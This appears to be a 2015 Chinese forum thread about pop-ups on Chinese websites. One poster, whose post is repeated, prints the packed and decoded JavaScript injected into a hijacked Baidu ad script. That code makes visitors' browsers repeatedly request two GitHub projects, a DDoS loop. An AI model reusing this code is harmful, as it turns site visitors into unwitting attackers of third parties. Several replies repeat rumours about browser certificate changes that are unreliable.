国内的网站好像被什么东西给黑了，一访问就跳弹窗

来自:关于超级大本营

flymonkey 发表于 2015-4-4 03:41
百度前两天登不上去，搞不好真的被黑了

来自:关于超级大本营
神仙打架，凡人遭殃，这次不知道又是谁和谁搞的事情……

神仙打架，凡人遭殃，这次不知道又是谁和谁搞的事情……
http://lt.cjdby.net/forum.php?mod=viewthread&tid=1989917&mobile=1打开看看就知道了

微软、google、火狐取消CNNIC（中国网络管理中心）认证书，所有中国网站的脚本都会被认为是恶意软件脚本

VV马超飞燕VV 发表于 2015-4-4 04:02
微软、google、火狐取消CNNIC（中国网络管理中心）认证书，所有中国网站的脚本都会被认为是恶意软件脚本
洋人这是要疯？当婊子还多少要立个牌坊呢

这是因为百度广告被植入了当访问者是中国以外的ip地址，就会攻击github的脚本
从中国以外的ip访问有百度广告的网站，就会攻击github一次
目前最简单的方法是装adp拦截所有百度广告

这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是我伟大的wall(不知道的百度搜索方*_bing_兴） 把百度的Javascript 脚本劫持了，对git——@_@hub 下地great__@__fire 镜像做DDOS攻击，也就是国外用户只有访问页面有百度广告，统计等JS代码，就会自动攻击这个网站。所以git@_@hub下进行了警告，意思是这个域名下有恶意代码。

我刚debug 了下，就是cbjs.baidu.com/js/m.js 下被劫持。
整个就替换了，插入代码部分为eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

解密后为document.write("<script src='htt@@p://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); ! window.jQuery && document.write("<script src='ht@@tp://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["htt@@ps://github.com/great@@@————@@fire", "ht@@tps://github.com/cn-ny@@@@#@#times"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

能看懂的朋友直接看吧

第二个不是向楼上所说的，第二个是Mo)@#zila,,,,,,chr@@_#$ome 浏览器把CNN@@IC（中国、互联网、地址管理@中心）的根证书吊销了，这个机构以前就是搞中文域名的那位，如果不知道百度之，其实原来我们windows,osx,linux都会认同c@n@nic的根证书，但是最近有个MCS的机构发得伪造各大公司的证书被某qiang（同第一条）用来做中间人攻击，所以导致现在这个根证书被吊销，导致后果不是不能访问。cn的网站，而是使用c@@nn2@ic证书的SSL服务器会被浏览器提示不安全，经此而已。

关键 @key 用了些符号代替，抱歉。 至于为什么这么晚上网发帖，是因为在国外。
至于我在裤衩发紫的论坛说下真相，估计又被说美分啥的。其实要以平常心看待事实，国家有发展也有地方做的不好，这是事实。

这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是我伟大的wall(不知道的百度搜索方*_bing_兴） 把百度的Javascript 脚本劫持了，对git——@_@hub 下地great__@__fire 镜像做DDOS攻击，也就是国外用户只有访问页面有百度广告，统计等JS代码，就会自动攻击这个网站。所以git@_@hub下进行了警告，意思是这个域名下有恶意代码。

我刚debug 了下，就是cbjs.baidu.com/js/m.js 下被劫持。
整个就替换了，插入代码部分为eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l.k("<5 p=\'r://H.B.9/8/2.0.0/8.C.t\'>\\h/5>");!J.K&&l.k("<5 p=\'r://L.8.9/8-T.t\'>\\h/5>");j=(6 4).c();7 g=0;3 i(){7 a=6 4;V 4.Z(a.10(),a.w(),a.x(),a.11(),a.y(),a.z())/A}d=["m://n.9/E","m://n.9/F-G"];o=d.I;3 e(){7 a=i()%o;q(d[a])}3 q(a){7 b;$.M({N:a,O:"5",P:Q,R:!0,S:3(){s=(6 4).c()},U:3(){f=(6 4).c();b=W.X(f-s);Y>f-j&&(u(b),g+=1)}})}3 u(a){v("e()",a)}v("e()",D);',62,64,'|||function|Date|script|new|var|jquery|com|||getTime|url_array|r_send2|responseTime|count|x3c|unixtime|startime|write|document|https|github|NUM|src|get|http|requestTime|js|r_send|setTimeout|getMonth|getDay|getMinutes|getSeconds|1E3|baidu|min|2E3|greatfire|cn|nytimes|libs|length|window|jQuery|code|ajax|url|dataType|timeout|1E4|cache|beforeSend|latest|complete|return|Math|floor|3E5|UTC|getFullYear|getHours'.split('|'),0,{}))

解密后为document.write("<script src='htt@@p://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>"); ! window.jQuery && document.write("<script src='ht@@tp://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["htt@@ps://github.com/great@@@————@@fire", "ht@@tps://github.com/cn-ny@@@@#@#times"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);

能看懂的朋友直接看吧

第二个不是向楼上所说的，第二个是Mo)@#zila,,,,,,chr@@_#$ome 浏览器把CNN@@IC（中国、互联网、地址管理@中心）的根证书吊销了，这个机构以前就是搞中文域名的那位，如果不知道百度之，其实原来我们windows,osx,linux都会认同c@n@nic的根证书，但是最近有个MCS的机构发得伪造各大公司的证书被某qiang（同第一条）用来做中间人攻击，所以导致现在这个根证书被吊销，导致后果不是不能访问。cn的网站，而是使用c@@nn2@ic证书的SSL服务器会被浏览器提示不安全，经此而已。

关键 @key 用了些符号代替，抱歉。 至于为什么这么晚上网发帖，是因为在国外。
至于我在裤衩发紫的论坛说下真相，估计又被说美分啥的。其实要以平常心看待事实，国家有发展也有地方做的不好，这是事实。

互联网广告要整治一下了

我现在访问超大也会弹窗，至于国外朋友怎么解决，例如在chrome 中javascript 添加例外，把[*.].baidu.com 禁掉即可。

github上有个翻墙程序的项目，TG要求撤掉，github不干，然后TG就攻击，然后就是连锁反应（那项目不简单）

VV马超飞燕VV 发表于 2015-4-4 04:02
微软、google、火狐取消CNNIC（中国网络管理中心）认证书，所有中国网站的脚本都会被认为是恶意软件脚本
改了一下host变好了，不知道能撑多久……

G@reat@fire说有国外朋友发现sina 脚本也被劫持。。。哎。。一个处长也能发动的战争。我们不是一直遵循王道嘛，这种手段我看就不要搞了，老被打脸不好。

看不懂，兔子有什么损失？

米兔 位置 洛基山下 北纬51度

没损失，主要是GFW修改百度广告脚本导致国外用户访问国内网站时被用来当炮弹攻击github的两个项目，github不堪重负当访问者访问两个项目时弹了个框框

我在国外上网不用翻墙，也有同样问题。只好关掉Firefox 的 javascript，但发现不能 login e-mail了。

現在 Sign-in 超大或　e-mail 后关掉 javascript。
　
　

我在国外上网不用翻墙，也有同样问题。只好关掉Firefox 的 javascript，但发现不能 login e-mail了。

現在 Sign-in 超大或　e-mail 后关掉 javascript。
　

微软、google、火狐取消CNNIC（中国网络管理中心）认证书，所有中国网站的脚本都会被认为是恶意软件脚本
应该是美国人对亚投行事件失利的报复行动！！

iceskycn 发表于 2015-4-4 04:23
这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是 ...
我知道你不是拿美分的，你是拿美元的

这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是 ...
美分党来啦

怪不得，我现在在美国上超大不停地弹窗

我还以为是电信搞鬼

iceskycn 发表于 2015-4-4 04:31
我现在访问超大也会弹窗，至于国外朋友怎么解决，例如在chrome 中javascript 添加例外，把[*.].baidu.com  ...
改用其他浏览器试试。比如360或搜狗或者搜狐啥的

github上有个翻墙程序的项目，TG要求撤掉，github不干，然后TG就攻击，然后就是连锁反应（那项目不简单）
真的假的？

这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是 ...
技术帝，膜拜一下。
小白问一下，这个插入代码是重新获取认证还是重置信任状态？

看着真累，zf干脆把对外的硬连接全断开，一劳永逸，翻墙可以彻底断绝

iceskycn 发表于 2015-4-4 04:23
这个真不是国外公司的错，这是两个事件触发的，第一 ，弹框只有在国外的用户访问国内网站才会弹框，原因是 ...
自作孽，不可活。

怪不得，我现在在美国上超大不停地弹窗
用手机上无压力

应该搞个规范，不能乱第三方网站的JS。
可是要这样，广告公司就哭了吧

看起来自动升级的浏览器也对百度进行了特殊化处理啊

支持国外对这些狗屎弹窗的封杀。

我现在访问超大也会弹窗，至于国外朋友怎么解决，例如在chrome 中javascript 添加例外，把[*.].baidu.com  ...
怎么去除google牛皮癣广告

说白了 就是国内某些广告公司惹的祸
特别是某度！！！

tg也可以在境内拦截所有的谷歌广告吧，电脑浏览器就那样了，tg可以选择支持一个开源的，在国内预装，更关键的是手机浏览器，不知道那些官僚有啥打算

还好手机不会。。

百度的广告早就该管管了，什么垃圾内容都有。网站需要广告，但内容和形式要规范。

github上有个翻墙程序的项目，TG要求撤掉，github不干，然后TG就攻击，然后就是连锁反应（那项目不简单）
看起来都用美国的浏览器很危险啊，随时可以让全中国人没有网用哦，是不是土共在测试浏览器的危险指数，或者国内某个准备搞浏览器的厂商搞了这次行动，比如百度准备搞自己的浏览器。

我擦，我刚才看你的帖子，它就出现了……这是啥意思啊？有几天了，用手机看帖子经常出现出现点确定就好，偶尔还反复出现。

这两天从国内登录美国网站倒是顺畅很多{:soso_e113:}

flymonkey 发表于 2015-4-4 03:41
百度前两天登不上去，搞不好真的被黑了

来自:关于超级大本营
我首页就是百度，你在哪天登不上？